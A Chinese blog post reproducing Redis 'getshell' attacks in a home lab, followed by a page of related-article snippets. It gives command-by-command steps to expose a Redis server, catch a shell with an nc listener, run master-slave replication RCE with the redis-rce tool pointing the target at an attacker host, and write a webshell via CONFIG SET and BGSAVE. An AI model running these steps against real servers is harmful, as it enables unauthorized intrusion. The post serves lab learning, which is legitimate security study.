Redis_getshell简单复现

最新推荐文章于 2024-12-17 00:10:07 发布
最新推荐文章于 2024-12-17 00:10:07 发布
阅读量399 收藏
点赞数
文章标签: redis 缓存 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52764444/article/details/126988345
版权

Redis_getshell简单复现## 标题

环境
系统:centos7(192.168.91.128)
攻击机:kali(192.168.91.120)

利用redis写webshell

centos7安装redis4.0:
1.输入
wget http://download.redis.io/releases/redis-4.0.9.tar.gz
2.解压编码:
tar -zxvf redis-4.0.9.tar.gz
cd redis-4.0.9
make
make test
make install
但是当执行make命令时出现报错
在这里插入图片描述
原因:未安装gcc
解决办法:
yum -y install gcc automake autoconf libtool make

在这里插入图片描述

安装后继续执行又一个报错
原因:在redis的目录中执行make出现致命错误没有文件,make是是安装redis进程!
解决方法:文件中没有jemalloc只有libc所以导致make错误,
输出make MALLOC=libc成功解决
make test
在这里插入图片描述

又一个报错
解决方法:
1.安装新的tcl,命令如下:
yum install -y tcl-devel
2.清空之前的make的缓存命令:
make distclean
3.重新make编译命令:
make
4.结束后重新测试命令:
make test
结束
make install

3.修改redis.conf的配置文件添加bind:0.0.0.0
vim redis.conf在这里插入图片描述

启动redis
redis-server /home/zero/redis-4.0.9/redis.conf
在这里插入图片描述

在kali上输入:在这里插入图片描述
redis-cli -h 192.168.91.128//连接目标redis

发现搜索不到
检查centos7是否开启6379端口
[root@localhost redis-4.0.9]# firewall-cmd --query-port=6379/tcp
#显示no
解决方法:
Centos7开启6379端口
1.查看zone名称
[root@localhost redis-4.0.9]# firewall-cmd --get-active-zones
#显示
public
interfaces: ens33
2.开启6379端口
[root@localhost redis-4.0.9]# firewall-cmd --zone=public --add-port=6379/tcp --permanent
#显示
success
3.重启防火墙
[root@localhost redis-4.0.9]# firewall-cmd --reload
#显示
success
4.检查端口是否开启
[root@localhost redis-4.0.9]# firewall-cmd --query-port=6379/tcp
#显示
yes在这里插入图片描述
监听8888端口
nc -lvvp 8888
clipboard.png
收到shell
在这里插入图片描述

Redis基于主从复制的RCE

首先关闭Centos中redis保护模式:
Kali连接靶机的redis
redis-cli -h 192.168.91.128
192.168.91.122:6379> slaveof 192.168.91.120 6379

vim redis.conf
clipboard.png

kali里安装:
git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand
git clone https://github.com/Ridter/redis-rce
进入RedisModules-ExecuteCommand目录输入

make
clipboard.png

输入
cp /home/zero/桌面/RedisModules-ExecuteCommand/module.so /home/zero/桌面/redis-rce
//确认一下自己的路径

把生成的moudle.so复制到redis-rce目录里面
mv module.so /root/redis-rce/

进入redis-rce目录启动
python3 redis-rce.py -r 192.168.91.128 -L 192.168.91.120 -f module.so
clipboard.png

Redis未授权访问漏洞

Centos-7桌面:
在这里插入图片描述

开启Redis服务:
redis-server /home/zero/redis-4.0.9/redis.conf
clipboard.png

kali连接:
redis-cli -h 192.168.91,128 //连接目标
CONFIG SET dir /home/zero/桌面 //设置备份路径
CONFIG SET dbfilename x.php //设置备份文件
SET x “” //在备份文件里面写入一句话木马
BGSAVE //保存
clipboard.png

返回redis桌面:
clipboard.png在这里插入图片描述

写入成功

复现文章:https://blog.youkuaiyun.com/m0_59924300/article/details/123206164

ZEROᯤ
关注
ssrf结合redis未授权getshell
07-07 1488
原理即为攻击者通过SSRF访问内网或本地的redis6379端口,如果刚好存在redis未授权,即可getshell
Redis未授权访问getshell复现笔记(一)
limb0的博客
09-12 815
Redis未授权访问getshell复现笔记(一) 利用周末复现了一下Redis未授权访问getshell,期间遇到了一些坑,虽然结果没什么悬念,却花费了不少时间,故将过程详细记录,留给有需要的人。此贴仅供新手参考,大佬勿喷。 一、 环境介绍 靶机:CentOS 6.5 (点击下载) IP:192.168.17.140 攻击机:Win10(本机) IP:192.168.8.195 二、...
Redis-Getshell:Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell
05-05
Redis-Getshell 其中的p参数为了区别端口P我将其改成了a Redis 未授权检测,密码爆破,Webshell写入,SSH公私钥写入,定时计划反弹Shell Usage:python3 RedisGetshell.py -H 127.0.0.1 -P 6379 还可以更完善的,后面有时间了就修改哈! Webshell SSH crontab
redis getshell方法
00勇士王子的博客
03-07 1940
redis getshell方法总结
redis***中的getshell问题总结
weixin_34381687的博客
08-21 126
【转】http://blog.youkuaiyun.com/lhc1105/article/details/51354561 转载于:https://blog.51cto.com/duallay/1958087
redis渗透中的getshell问题总结
热门推荐
Exploit的小站~
05-10 2万+
 0x00 前言 redis现在很多都是直接对外开放端口,从外网无需任何验证即可直接访问到。相关的例子可以从shodan或者zoomeye上找到。那么问题来了,作为一个内存数据库redis上肯定也有很多敏感信息,比如redis用于做session的存储,可能导致敏感信息泄露。不过最近研究redis从乌云社区和drops上看到有人getshell,思路比较有趣,特地写一下总结。 ...
七、利用redis主从复制getshell
dahege666的博客
03-02 1472
一、测试环境 redis主机:kali 192.168.1.138 redis从机:centos7 192.168.1.27 二、测试过程 1.分别安装并开启redis数据库,注意4.X以上需要redis.conf关闭保护模式 2.在kali上连接靶机redis服务,并设置主从状态(将kali设置为redis主机) 3.在kali上编译恶意代码 git clone https...
Vulhub:Redis[漏洞复现]
如有错误感谢斧正
12-17 1154
我们借助Lua沙箱中遗留的变量`package`的`loadlib`函数来加载动态链接库`/usr/lib/x86_64-linux-gnu/liblua5.1.so.0`里的导出函数`luaopen_io`。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象`package`,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。服务启动后,我们可以使用`redis-cli -h your-ip`连接这个redis服务器。
redis 在渗透中 getshell 方法总结
chenglanqi6606的博客
05-07 2699
0x00 前言 今天同学突然提到了redis,想到最近搞站确实有一段时间没有遇到redis getshell的场景了(主要是最近懒,搞得少),有些利用方式都忘的差不多,这里再对常见的redis getshell方式总结并复现一遍,避免遗忘。如果有同学恰好看到了这篇文章,并能解决自己的问题,...
redis 未授权访问及getshell
Guoke324的博客
04-06 843
目录 redis未授权访问 redis getshell方法 写 webshell 文件 利用 写SSH key进行 getshell 通过写corntab的方式进行getshell redis未授权访问 Redis在默认情况下,会绑定在0.0.0.0:6379,如果没有采用限制IP访问,就会将Redis服务暴露在公网上,并且在没有设置密码认证的情况下,会导致任意用户未授权访问Redis以及读取Redis数据并写入公钥进行远程连接等。 利用python去检测,或者...
SSRF+Redis未授权getshell
yuan_boss的博客
04-14 2086
当一个网站具有ssrf漏洞,如果没有一些过滤措施,比如没过滤file协议,gophere协议,dict等协议,就会导致无法访问的内网服务器信息泄露,甚至可以让攻击者拿下内网服务器权限。
Redis未授权getshell及修复方案
打工人日记
12-31 750
应用介绍 简单点说就是一个日志型数据库,并有主从同步的功能(优化性能)。 漏洞介绍 默认配置下redis并没有设置密码,被攻击者恶意利用可以导致未授权访问,可以有多种利用方式:服务器权限被获取和数据删除、泄露、加密勒索、植入yam2 minerd 挖矿程序、watch-smartd挖矿木马等 安装redis docker run -itd --name redis-test -p 6379:6379 redis 常用命令 ping:检测是否连通且有权限执行命令 info:读取Redis敏感数据 keys:
redis未授权到getshell
weixin_68408599的博客
06-12 1506
写入webshell虽然简单便捷,但是很多网站都严格限制了写入规则,但是可以通过定时任务,写入公钥等来获取webshell并建立持久性控制。自己使用需要小心,redis未授权是比较常见的漏洞了,常常被用于执行挖矿病毒,甚至是勒索病毒。
Redis Getshell自动化实践之webshell
乐枕的家
07-21 4675
前两篇文章介绍了两种直接root权限getshell的方式,这里介绍通过写入webpage来得到shell的半自动化脚本. 脚本的意义是将误报的可能性降到最低,发现目标并简化手工操作.利用流程1 通过redis未授权访问漏洞,向redis插入一条记录,内容是一句话木马或其他webshell 2 找到web绝对路径,写入webshell 3 菜刀或其它半自动化exp逻辑半自动的原因是最后写入的w
redis服务连接及常规操作和redis服务getshell
whale_waves的博客
05-13 947
Redis,英文全称是(远程字典服务),是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。redis服务于传统服务器不同,redis是内存数据库Redis的数据是存在内存中的。它的读写速度非常快,每秒可以处理超过10万次读写操作,因此redis被。
从Reids漏洞聊到getshell手法,再到计划任务和主从复制原理
milu_Sec的博客
01-07 1593
redis漏洞总结 getshell手法 写文件原理
redis未授权getshell整合利用
qq_40898302的博客
06-13 1656
redis未授权getshell四种方式
未授权访问漏洞靶场
最新发布
04-01
<think>好的,我现在需要帮助用户寻找关于未授权访问漏洞的靶场和学习资源。首先,我得回顾用户提供的引用内容,看看里面有没有相关的信息。用户提到了引用1到5,其中引用2、3、4、5都提到了靶场或者相关漏洞的实战内容。比如引用2提到了Hadoop和Redis的靶场实战,引用3提到了访问特定路径获取信息,引用4提到了漏洞复现GETSHELL的方法,引用5则介绍了WebGoat这个Java靶场程序。 接下来,我需要整理这些信息,给出用户具体的靶场资源。首先,Vulfocus在引用2和4中被提到,应该是一个综合靶场平台,支持多漏洞环境,包括Hadoop和Redis的未授权访问。然后WebGoat在引用5里,虽然主要针对Web漏洞,但可能包含相关的内容。另外,用户可能需要自己搭建环境,比如用Docker部署Hadoop或Redis,这在引用3中提到过修复方法,可能搭建时需要注意安全配置。 然后,用户可能还需要学习资源,比如文章或实战指南。引用2和3的标题都涉及未授权访问漏洞的总结和实战,可以推荐相关的文章链接。另外,Metasploitable和DVWA虽然主要是其他漏洞,但可能也包含未授权访问的案例,需要确认一下。 还要注意用户提到的合规性问题,引用1强调了在非授权情况下进行渗透测试是不合法的,所以必须建议用户在本地搭建靶场,如引用4提到的靶场环境下载方式,或者在Vulfocus这样的平台上练习。 最后,要确保回答结构清晰,分点列出靶场推荐、学习资源、注意事项,并且每个部分都有具体的例子和引用来源。同时,生成的相关问题要围绕用户可能进一步的需求,比如漏洞原理、修复方法、搭建步骤等。</think>### 未授权访问漏洞靶场与学习资源推荐 #### 一、靶场环境推荐 1. **Vulfocus综合漏洞靶场** - 支持Hadoop、Redis、Kubernetes等未授权访问漏洞的实战环境 - 提供一键启动的容器化靶场,可直接通过Web界面操作 - 示例漏洞复现: - Redis未授权访问导致GETSHELL(需配合SSH密钥写入)[^4] - Hadoop YARN未授权访问远程命令执行 - 平台地址:`https://vulfocus.cn/` [^2][^4] 2. **WebGoat靶场(OWASP官方)** - 包含访问控制缺陷相关实验(部分涉及未授权访问原理) - 提供30+安全实验课程,含视频演示和分步骤指导 - 项目地址:`https://github.com/WebGoat/WebGoat` [^5] 3. **自建环境(推荐)** - **Hadoop/YARN环境搭建**: ```bash docker pull sequenceiq/hadoop-docker docker run -it -p 8088:8088 sequenceiq/hadoop-docker /etc/bootstrap.sh -bash ``` - **Redis未授权环境**: ```bash docker run -d -p 6379:6379 redis --protected-mode no ``` - 注意:需关闭服务认证模块模拟漏洞[^3] #### 二、学习资源 1. **漏洞原理与实战文章** - 《Hadoop & Redis未授权访问漏洞分析与利用》 - 《Kubernetes API未授权访问漏洞修复指南》 2. **渗透测试方法论** - 未授权访问漏洞的发现路径: - 端口扫描 → 服务识别 → 尝试默认配置访问 → 利用工具验证 - 常用工具链:Nmap、Redis-cli、Metasploit(含Hadoop exploit模块) 3. **合规性注意事项** - 必须使用本地或授权靶场进行测试(如Vulfocus)[^1] - 禁止对非授权目标实施扫描/渗透操作 #### 三、典型漏洞修复方案 1. 强制启用认证机制(如Redis的`requirepass`)[^3] 2. 限制服务监听IP(如Hadoop绑定内网地址) 3. Kubernetes需配置`--anonymous-auth=false` 4. 使用网络ACL限制访问源(如云服务器安全组规则)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值